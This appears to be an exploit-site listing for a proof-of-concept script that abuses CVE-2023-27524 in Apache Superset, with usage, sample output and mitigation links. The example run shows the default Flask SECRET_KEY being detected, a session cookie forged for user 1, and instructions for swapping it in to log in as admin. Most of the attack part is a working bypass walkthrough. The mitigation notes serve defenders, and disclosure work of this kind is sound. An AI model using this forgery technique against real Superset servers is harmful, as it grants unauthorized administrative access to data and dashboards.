## https://sploitus.com/exploit?id=E93AFBC4-E81F-599F-8EAB-B3621904F348
# CVE-2023-27524: Apache Superset Auth Bypass
Script to check whether an Apache Superset server is vulnerable to CVE-2023-27524 (a default Flask `SECRET_KEY` left in place). If the server is vulnerable, it forges a session cookie with `user_id = 1`, which is usually the `admin` user, bypassing authentication and granting access to the dashboard. Currently, there are about 3000 servers world-wide running Apache Superset.


## Usage

```
usage: python3 CVE-2023-27524.py --url URL
```

## Basic Example

```
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
```


## Mitigations
Follow the [instructions here](https://superset.apache.org/docs/installation/configuring-superset/) to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation) so that existing database connection information is preserved.


## Disclaimer
This POC is created for educational purposes only.

## References
* https://github.com/horizon3ai/CVE-2023-27524
* https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/